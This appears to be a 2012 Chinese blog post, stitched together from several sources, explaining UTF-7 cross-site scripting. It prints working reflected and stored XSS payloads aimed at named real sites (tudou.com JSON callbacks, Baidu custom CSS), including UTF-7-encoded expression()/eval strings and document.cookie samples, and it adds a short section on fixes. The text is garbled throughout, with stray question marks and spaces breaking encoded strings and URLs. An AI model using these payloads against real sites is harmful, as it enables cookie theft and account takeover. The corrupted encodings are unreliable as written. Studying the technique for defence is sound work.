utf-七 xss

utf-7 xss

utf-7 xss
2012-02-13 22:49 星期一 晴　　----------------------------------------- UTF-7 XSS Paper ----------------------------------------- *****************?

0x01. UTF-7是什么?

************************************************** *************************************************** *******************?

UTF-7 (7-位元 Unicode 转换格式（Unicode Transformation Format，简写成 UTF））是一种可变长度字符编码方式，?

用以将 Unicode 字符以 ASCII 编码的字符串来呈现，可以应用在电子邮件传输之类的应用。?

Wiki-URL: http://zh.wikipedia.org/zh-cn/UTF-7?

<1> 可以通过设置?@charset=utf-7 设定为 utf-7编码?

<2> 可以通过在正文开头设置 utf-7 bom 设定为 utf-7编码?

utf-7 bom 目前知道的有4个?

+/v8 | +/v9 | +/v+ | +/v/?

************************************************** *************************************************** *******************?

**********************?

0x02. 可以针对哪些目标?

************************************************** *************************************************** *******************?

utf-7 相对于其他字符集有什么特点呢??

<1> 以 ASCII可显示字符 来编码的，这点在逃过过滤检测非常有用?

<2> 有 bom 这个东东，其他一些字符集没有，大大地提高了利用的几率?

utf-7 可以攻击的目标?

<1> http response 设置不严格的，比如设置 Content-Type: text/html?

<2> 字符集没有专门指定的，是模糊的?

<3>?标签之前有机会设置字符集的?

用 utf-7 来攻击的步骤?

<1> 通过各种手段先夺取到utf-7字符集的优先权，使utf-7编码能被解码?

常见手段有?

在正文开始设置bom标记?

在之前设置字符集?

遇到默认字符集（没专门指定字符集）的网页通过编码格式争夺?

<2> 因为utf-7编码特点，可以逃过绝大部分过滤检测，再配合常规的XSS手法?

最简单的就是可以把 '<' 和 '>' 编码掉，而绝大部分的网站也只是简简单单地对这两个符号进行转移或过滤?

************************************************** *************************************************** *******************?

************************?

0x03. 怎样利用demo或说明?

************************************************** *************************************************** *******************?

Reflected XSS:?

[Json utf-7 xss]?

<格式> http://xx/..callback=[utf-7头][utf-7数据流]...?

黑哥挖的一个tudou的json callback?

http://www.tudou.com/my/channel/item.srv?icode=enQ CgQKJTDs&callback=%2B%2Fv8?

%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkA cAB0AD4AYQBsAGUAcgB0ACg?

AMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAP gA8AC8AaAB0AG0APg-%20xsadas?

[utf-7头] -> %2B%2Fv8 (+/v8)?

[utf-7数据流] -> %2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB 0AD4AYQBsAGUAcgB0ACgAMQApADsAP?

AAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB 0AG0APg-?

[utf-7数据解码后] ->?

Stored XSS:?

[baidu自定义css utf-7 css]?

<格式> css正文开始必须为[utf-7头]，[utf-7数据流]可在[utf-7头]后正文的任意位置?

黑哥blog里css的utf-7 xss?

http://hitn.bdimg.com/hi_heige/css/item/ee0 92fa60.css?

css正文的内容:?

-------------------------------------------------- ------------------?

+/v8?

#phx{FILTER: Alpha(Opacity=100, FinishOpacity=10, Style=2, StartX=20, StartY=40, FinishX=0, FinishY=0)gray(); WIDTH: 220px;?

HEIGHT: 32px}?

...?

body{background:#FFFFFF;font- family:'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpA G8AbgAoACgAdwBpAG4AZABvAHcALgByAHIAcgA9AD0AMQAp AD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8ASA BhAHAAcAB5ACAATgBl AHcAIABZAGUAYQByACEAIAB0AGgAeAAgAG0AYQByAGkAbwAuAC 8AKQApADsAJwApACkAOwBmAG8AbgB0AC0AZgBhAG0Aa QBsAHkAOgAnA-';}?

...?

-------------------------------------------------- ------------------?

[utf-7头] -> %2B%2Fv8 (+/v8)?

[utf-7数据流] -> +AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoA CgAdwBpAG4AZABvAHcALgByAHIAcgA9AD?

0AMQApAD8AJwAnADoAZQB2AGEAbAAoACcAcgByAHIAPQAxADsAZ QB2AGEAbAAoAGEAbABlAHIAdAAoAC8ASABhAHAAcAB5A?

CAATgBlAHcAIABZAGUAYQByACEAIAB0AGgAeAAgAG0AYQByAGk AbwAuAC8AKQApADsAJwApACkAOwBmAG8AbgB0AC0AZgB?

hAG0AaQBsAHkAOgAnA-?

[utf-7数据解码后] -> x';xss:expression((window.rrr==1)?'':eval('rrr=1;e val(alert(/Happy New Year! thx mario./));'));font-family:'?

************************************************** *************************************************** *******************?

********************?

0x04. 有哪些修复方法?

************************************************** *************************************************** *******************?

要防御 utf-7 xss，只需要防止utf-7字符集被识别就行?

utf-7 能使用主要通过两种方式?

<1> 设置字符集为 utf-7?

<2> 在文本开头设置 utf-7 bom?

看看上文 utf-7 可以攻击的目标?

<1> http response 设置不严格的，比如设置 Content-Type: text/html?

<2> 字符集没有专门指定的?

<3>?标签之前有机会设置字符集的?

再反推防御?

<1> http response 严格设置，比如 json 的一定要设置为 Content-Type: "json"，不然会被 callback 攻击?

<2> 字符集在开发阶段就指定好，避免被抢夺优先权。?

如果不能先设置好字符集的（比如css）把正文开始插入一个 space 或 \n，让 utf-7 bom 失效?

<3> 不要让标签之前有机会设置字符集的?

demo:?

<1> 比如像存储类www.webyuanma.com的数据，应该在做了jsp过滤净化的基础上，防止出现 utf-7 bom?

就像 baidu在自定义css 的第一个位置强制插入一个 space?

为了不破坏用户所想要表达的数据之类，在第一个位置插入一个 space 或 \n 都可以?

<2> 像json被攻击的格式，在正文处也可以这样处理?

http://apps.hi.baidu.com/dashan/data/status?asyn=1 &callback=[utf-7头][utf-7数据流]......?

对于 json 的场景，还需要设置 header: Content-Type: "json" (格式貌似不对，表示那么个意思就是)?

或者在正文的asp.net第一个位置插入一个 space或 \n?

************************************************** *************************************************** *******************?

想到大部分人都比较懒~ 不想自己去搜?

就给一些很不错的参考资料链接吧~?

http://openmya.hacker.jp/hasegawa/public// s6/h6.html?file=datae.txt (按方向键左右操作)?

http://openmya.hacker.jp/hasegawa/security/utf7cs. html?

http://secdocs.lonerunners.net/documents/details/2 056-xss-lightsabre-techniques-using-hackvertor?

明天又要纠结 javasnoop 鸟= =~ 雅蠛蝶~?

-------------------------------------------------- ------实验-------------------------------------------------- ------------------------------------------- 再访问 发现xss没反应?

仔细看了下 原来被 强制在第一个位置插入了一个空格 破坏了?

度娘把我的 utf-7 bom 赤裸裸地给ons了~?

雅蠛蝶呀~?

我还想玩玩呢~ 居然就被补鸟~ T_T~ 泪奔呀~?

-------------------------------------------------- -----------------------------?

收集了一些 utf-7 bom?

大家拿去玩吧 =.=~?

hackvertor 给的也只有这4个?

+/v8 +/v9 +/v+ +/v/?

原文?

UTF-7 Kung fu lesson continued?

·Multiple BOM characters allow UTF-7 to be executed?

·BOM character has to be first character?

·Not that useful but still interesting?

·%2B%2F%76%38?

·%2B%2F%76%39?

·%2B%2F%76%2b?

·%2B%2F%76%2f?

-------------------------------------------------- -----------------------------?

黑哥(5up3rh3i) 也给了个 utf-7 reflected xss 的例子?

在IE下测试成功?

http://www.tudou.com/my/channel/item.srv?icode=enQ CgQKJTDs&callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGI AbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQ ApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8A C8AaAB0AG0APg-%20xsadas?

更多例子：?



+/v8?

body {?

font-family:?

'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAo AGEAbA?

BlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5 ADoAJw-';?

}?

+/v8?

body {?

font-family:"+AHgAIgA7AHgAcwBzADoAZQB4AHAAcgBlAHMA cwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgB4AG8AeAA9AD0AMQA pAD8AJwAnADoAZQB2AGEAbAAoACIAeABvAHgAPQAxADsAZQB2AG EAbAAoAGEAbABlAHIAdAAoAC8AWABTAFMAIQAvACkAKQA7ACIAK QApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAI-";?

}?

//x";xss:expression((window.xox==1)?'':eval("xox=1 ;eval(alert(/XSS!/));"));font-family:"?

//x";xss:expression((window.xox==1)?'':eval("xox=1 ;document.write('');"));font-family:"?

继续更多：?

摘自我的博客[url]http://hi.baidu.com/thanks4sec/home[/url]?

想看UTF-7XSS效果的同学请用ie访问[url]http://hi.baidu.com/hi_heige/blog[/url]?

--------------------------------------?

大概是由heige牵头，导致UTF-7 XSS最近满火的，好多大侠也都在博客里撰文探讨?

最喜欢奇技淫巧了，倒腾了一翻，忍不住写点东西出来?

不对的地方请指正?

UTF-7是什么?

UTF-7 (7-位元 Unicode 转换格式（Unicode Transformation Format，简写成 UTF）) 是一种可变长度字元编码方式，用以将 Unicode 字元以 ASCII 编码的字元串来呈现，可以应用在电子邮件传输之类的应用。?

举个例子：?

编码后就成了?

+ADw-script+AD4-alert(document.cookie)+ADw-/script +AD4-?

原理阐述?

由于标签没有指定明确的charset，导致浏览器将编码以utf-7解析，从而形成XSS?

比如一个回应包如下:?

HTTP/1.1 200 OK?

Content-Type: text/html.... ...?

我们看到，http头里并没有指定charset，那么浏览器会将包内容以何种编码形式解析呢？?

OK，UTF-7 XSS的利用就在这里了?

linx在博客里也讲了，归根结底，这个问题还出在IE处理meta steam的编码策略上?

利用方法?

PS.针对utf-7微软之前已经对ie打过补丁了，所以以下的利用未必成功，仅供参考学习之用?

情况1.?

如：?


< /title>?

< meta http-equiv="content-type" content="text/html; charset=utf-8">?

在meta charset之前插入语句，使得charset成utf-7 ( 在IE8下测试不成功)?

情况3?

如：?



< head>?

< meta http-equiv="content-type" content="text/html>?

< /head>?

< body>?

< iframe src="http://target.example.com/NOTFOUND/%2BACIAPgA 8-script%2BAD4-alert%28document.location%29%2BADw-% 2Fscript%2BAD4APAAi-">?

< /body>?

< /html>?

页面默认不以utf-7解析。通过在iframe中包含utf-7的语句，使得其解析成utf-7?

情况4?

如：?

[url]http://www.tudou.com/my/channel/item.srv?icod e=enQCgQKJTDs&callback=%2B%2Fv8%20%2BADwAaAB0AG0APg A8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0A CgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkA PgA8AC8AaAB0AG0APg-%20xsadas[/url]?

[url]http://apps.hi.baidu.com/dashan/data/status?a syn=1&callback=[/url]【utf-7头】【utf-7数据流】......

json,这个很多了?

情况5?

· UTF-7 BOM character can force UTF-7 in a external style sheet?

· Would you let me upload a style sheet??

· @charset UTF-7; works?

· But you dont need it?

· +/v8 is all you need?

+/v8?

body {?

font-family:?

'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAo AGEAbA?

BlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5 ADoAJw-';?

}?

CSS utf-7 XSS：在css里头通过+/v8（这里的原理还是之前说的，控制文件的开头的几个字节）控制编码成utf-7，heige在百度空间里用的就是这招

?

查看更多 下一篇